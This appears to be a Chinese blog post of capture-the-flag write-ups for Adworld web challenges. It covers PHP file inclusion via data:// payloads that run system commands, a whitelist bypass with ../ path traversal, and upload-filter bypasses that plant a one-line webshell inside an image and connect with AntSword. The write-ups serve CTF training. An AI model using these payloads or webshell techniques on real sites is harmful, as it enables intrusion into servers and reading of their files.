Web安全挑战解析:文件包含漏洞与代码审计实战
攻防世界
WEB-Challenge area -Web php include
代码审计可以轻松知道本题考查文件包含并且过滤的php://
所以我们用data://伪协议来传输数据,成功执行phpinfo()
http://111.200.241.244:59922/index.php?page=data://text/plain,<?php phpinfo();?>
接下来我们利用大小写测试服务器操作系统(其实上图已经知道是ubuntu但还是习惯性测试一下)
http://111.200.241.244:59922/index.phP
返回错误得知操作系统是Ubuntu
接下来就好办了,我们来获取目录,直接得到了flag文件
http://111.200.241.244:59922/index.php?page=data://text/plain,<?php system('ls')?>
获取flag
#cat文件,在源码中找到flag
http://111.200.241.244:59922/index.php?page=data://text/plain,<?php system('cat fl4gisisish3r3.php')?>
#直接获取文件内容
http://111.200.241.244:59922/index.php?page=data://text/plain,<?php show_source('fl4gisisish3r3.php');?>
flag:
本题
data://协议
条件:
(1)php>5.2、(2)allow_url_fopen:on、(3)allow_url_include :on
使用:
data://text/plain, #直接传输代码
data://text/plain;base64, #传输base64编码
WEB-Challenge area -upload1
本题较为简单,在此只讲述该题解题大致流程。国庆校ctf赛中也有一道upload题,在此主要讲述本人ctf比赛中解upload题的过程
解法1
1、随便上传一个文件,得到提示只能上传图片
2、将png图片写入一句话木马直接上传
3、burp抓包修改后缀为php绕过前端认证
4、蚁剑连接获得flag
解法2
1、上传文件后看到弹出提示框,猜测是前端js判断
2、禁用javascript并上传php文件
3、蚁剑连接获得flag
校ctf竞赛upload题解:
打开网站一片漆黑,查看源代码发现提示文件包含
接着利用目录扫描工具dirsearch扫描得到目录,发现目录下有一个robots.txt可以访问
访问robots.txt,此处便给出了文件上传的url
同样是只能传图片,上传txt文件提示只能上传png | jpeg | gif文件,所以这是白名单
白名单的题自然想到%00截断和图片马,前面提示了文件包含我们直接开始制作图片马
#得到图片马
copy 1.gif/b + 1.php/a 2.gif
上传成功但是文件名已经被改变说明有二次渲染,在这里就将上传的文件下载下来,用16进制编辑器将上传前后的两张图片对比,在其一致的地方插入一句话木马,遗憾的是,换了几个不同的地方试了好几遍都上传成功但是无法用蚁剑连接
在网上查阅资料,阅读到一篇文章:“将上传后下载下来的图片再次上传并下载,对比两个图片发现完全一致”,借用此方法,在下载下来的图片的里插入一句话木马并上传
利用文件包含成功连接
至此flag已经唾手可得了,进入根目录打开终端
WEB-Challenge area -ics-06
本题题目描述:“云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹”
根据描述进入网站点击报表中心,查看源码、扫描目录都没有发现有用信息,看着界面中的送分题三个字开始迷茫…
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-evH526FL-1633761300772)(https://img-blog.csdnimg.c,n/8d752cca8d034c72865449b12529959e.png)]](https://i-blog.csdnimg.cn/blog_migrate/563f6f2b45af6088a2b50713a0ccae2e.png)
这时看见url上有get方式传递了id,猜测爆破id值。写脚本得到一个从数字0到5000的字典,上burp爆破,发现不同长嘿嘿
点进去找到flag
WEB-Challenge area -baby_web
题目描述:“想想初始页面是哪个”
看题目描述想到index.php,但是输入index.php会自动跳转到1.php。这里用到burp抓包,将get的1.php改成index.php发现返回Flag is hidden!
这个提示不就是叫人找flag嘛,首先在Render里面找没能找到,然后点"头"最终flag就在值里面
WEB-Challenge area -Training-WWW-Robots
这题和上题一样纯属白给,标题告诉我们有robots文件那我们就访问下看看
直接给出了flag的文件,访问即得flag
WEB-Challenge area -warmup
首先按F12检查源代码,提示source.php
那我们就访问它
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
显然这是要我们代码审计,满足这三个条件我们就可以成功文件包含,1和2必然满足,把目光放在3上
1)! empty($_REQUEST['file']
2)is_string($_REQUEST['file']
3)emmm::checkFile($_REQUEST['file']
回到静态函数里,共有四个if语句。
第一个if:这个不需要担心
第二个if:当参数里面包含$whitelist时就返回True,所以参数里只需要有source.php或者hint.php即可
第三个if:取参数第一个?前的部分并进行白名单判断
第四个if:将参数url解码后执行与第三个if相同的操作
可以得出?source.php?file=hint.php?(…)能够成功执行文件包含,至此还差最重要的一步,找到flag文件的位置,再次代码审计,发现hint.php很可疑,所以访问下,直接告诉我们flag在ffffllllaaaagggg文件里
根据include $_REQUEST[‘file’]得知,将接收的变量file包含并执行而file一定要有source.php 或hint.php所以猜测传给source.php或hint.php的参数为flag文件的地址就能返回flag
所以我们构造
?source.php?file=hint.php?ffffllllaaaagggg
?source.php?file=hint.php?../ffffllllaaaagggg
...
#最终得到flag
?source.php?file=hint.php?../../../../../../ffffllllaaaagggg
该题主要考察代码审计,其中有点绕的是将file变量传给source.php文件,在source.php文件中包含接收的file变量,并且file变量是一个php文件并且以GET方式将payload传参。
扫一扫
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
